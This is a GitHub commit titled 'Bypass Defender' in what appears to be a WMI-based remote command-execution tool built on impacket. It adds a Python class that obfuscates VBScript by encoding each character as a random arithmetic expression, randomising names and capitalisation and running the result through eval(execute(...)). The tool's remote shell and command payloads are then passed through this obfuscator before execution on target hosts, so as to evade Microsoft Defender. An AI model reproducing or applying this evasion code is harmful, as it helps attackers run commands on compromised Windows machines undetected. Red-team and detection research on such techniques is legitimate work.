Bypass Defender

Signed-off-by: XiaoliChan <30458572+XiaoliChan@users.noreply.github.com>
XiaoliChan · Apr 7, 2024 · 30bf1f9 · 30bf1f9
1 parent 1f92efa
commit 30bf1f9
Show file tree

Hide file tree

Showing 8 changed files with 78 additions and 3,626 deletions.
diff --git a/lib/methods/Obfuscator.py b/lib/methods/Obfuscator.py
@@ -0,0 +1,70 @@
+import random, string
+
+class VBSObfuscator:
+	def __init__(self):
+		pass
+		#self.__vbs_content = vbs_content
+
+	def randCapitalization(self, characters):
+		capicharacter = ""
+		for character in characters:
+			lowup = random.randrange(0,2)
+			if lowup == 0:
+				capicharacter += character.upper()
+			if lowup == 1:
+				capicharacter +=  character.lower()
+		return capicharacter
+
+	#Random mathematical expression decision
+	def expr(self, char):
+		range = random.randrange(100, 10001)
+		exp = random.randrange(0, 3)
+		if exp == 0:
+			return str((range+char)) + "-" + str(range)
+		if exp == 1:
+			return str((char-range)) + "+" + str(range)
+		if exp == 2:
+			return str((char*range)) + "/" + str(range)
+
+	def obfu(self, body):
+		encBody = ""
+		for i in range(0, len(body)):
+			if encBody == "":
+				encBody += self.expr(ord(body[i]))
+			else:
+				encBody += "*" + self.expr(ord(body[i]))
+		return encBody
+
+	def generator(self, vbs_content=None):
+		#Splitter is set to be the "*" symbol,
+		#since we are not using it in obfuscation
+		splitter = str(chr(42))
+
+		#Random function names
+		NUM_OF_CHARS = random.randrange(5, 60)
+		pld = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
+		array = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
+		temp = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
+		x = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
+
+		#Random Sub names
+		subOne = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
+		subTwo = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
+
+		#Write to destination file
+		obfuscated_file = ""
+		obfuscated_file += self.randCapitalization("Dim " + pld + ", " + array + ", " + temp) + "\n"
+		obfuscated_file += self.randCapitalization("Sub " + subOne) + "\n"
+		obfuscated_file += self.randCapitalization(pld + " = ") + chr(34) + self.obfu(vbs_content) + chr(34) + "\n"
+		obfuscated_file += self.randCapitalization(array + " = Split(" + pld + ", chr(eval(") + self.obfu(splitter) + ")))\n"
+		obfuscated_file += self.randCapitalization("for each " + x + " in " + array) + "\n"
+		obfuscated_file += self.randCapitalization(temp + " = " + temp + " & chr(eval(" + x) + "))\n"
+		obfuscated_file += self.randCapitalization("next") + "\n"
+		obfuscated_file += self.randCapitalization(subTwo) + "\n"
+		obfuscated_file += self.randCapitalization("End Sub") + "\n"
+		obfuscated_file += self.randCapitalization("Sub " + subTwo) + "\n"
+		obfuscated_file += self.randCapitalization("eval(execute(" + temp) + "))\n"
+		obfuscated_file += self.randCapitalization("End Sub") + "\n"
+		obfuscated_file += self.randCapitalization(subOne) + "\n"
+
+		return obfuscated_file
diff --git a/lib/modules/exec_command.py b/lib/modules/exec_command.py
@@ -11,12 +11,15 @@
 from lib.modules.filetransfer import filetransfer_Toolkit
 from lib.methods.classMethodEx import class_MethodEx
 from lib.methods.executeVBS import executeVBS_Toolkit
+from lib.methods.Obfuscator import VBSObfuscator
 from impacket.dcerpc.v5.dtypes import NULL
 
 class EXEC_COMMAND():
     def __init__(self, iWbemLevel1Login, codec):
         self.iWbemLevel1Login = iWbemLevel1Login
         self.codec = codec
+
+        self.obfu = VBSObfuscator()
 
     def save_ToFile(self, hostname, content):
         path = 'save/'+hostname
@@ -124,7 +127,7 @@ def exec_command_WithOutput(self, command, ClassName_StoreOutput=None, save_Resu
             # Experimental: use timer instead of filter query
             with open('./lib/vbscripts/Exec-Command-WithOutput.vbs') as f: vbs = f.read()
             vbs = vbs.replace('REPLACE_WITH_COMMAND', base64.b64encode(command.encode('utf-8')).decode('utf-8')).replace('REPLACE_WITH_FILENAME', FileName).replace('REPLACE_WITH_CLASSNAME',ClassName_StoreOutput).replace('RELEACE_WITH_UUID',CMD_instanceID).replace('REPLACE_WITH_TASK',random_TaskName)
-            tag = executer.ExecuteVBS(vbs_content=vbs, returnTag=True)
+            tag = executer.ExecuteVBS(vbs_content=self.obfu.generator(vbs), returnTag=True)
             #filer_Query = r"SELECT * FROM __InstanceModificationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
             #tag = executer.ExecuteVBS(vbs_content=vbs, filer_Query=filer_Query, returnTag=True)
 
@@ -200,6 +203,7 @@ def __init__(self, iWbemLevel1Login, dcom, codec, addr):
 
         self.executer = executeVBS_Toolkit(self.iWbemLevel1Login)
         self.fileTransfer = filetransfer_Toolkit(self.iWbemLevel1Login, self.dcom)
+        self.obfu = VBSObfuscator()
 
         # Reuse cimv2 namespace to avoid dcom limition
         class_Method = class_MethodEx(self.iWbemLevel1Login)
@@ -315,6 +319,8 @@ def default(self, line):
         with open('./lib/vbscripts/Exec-Command-WithOutput-Shell.vbs') as f: vbs = f.read()
         vbs = vbs.replace('REPLACE_WITH_CWD', base64.b64encode(self.cwd.encode('utf-8')).decode('utf-8')).replace('REPLACE_WITH_COMMAND', base64.b64encode(command.encode('utf-8')).decode('utf-8')).replace('REPLACE_WITH_FILENAME', FileName).replace('REPLACE_WITH_CLASSNAME', self.ClassName_StoreOutput).replace('RELEACE_WITH_UUID',CMD_instanceID).replace('REPLACE_WITH_TASK',random_TaskName)
         # Reuse subscription namespace to avoid dcom limition
+
+        vbs = self.obfu.generator(vbs)
         if self.iWbemServices_Reuse_subscription is None:
             tag, self.iWbemServices_Reuse_subscription = self.executer.ExecuteVBS(vbs_content=vbs, returnTag=True, BlockVerbose=True, return_iWbemServices=True)
         else:

diff --git a/lib/tmp/WriteFile-Bak.vbs b/lib/tmp/WriteFile-Bak.vbs
diff --git a/lib/tmp/firewall_test-2.py b/lib/tmp/firewall_test-2.py
diff --git a/lib/tmp/firewall_test.py b/lib/tmp/firewall_test.py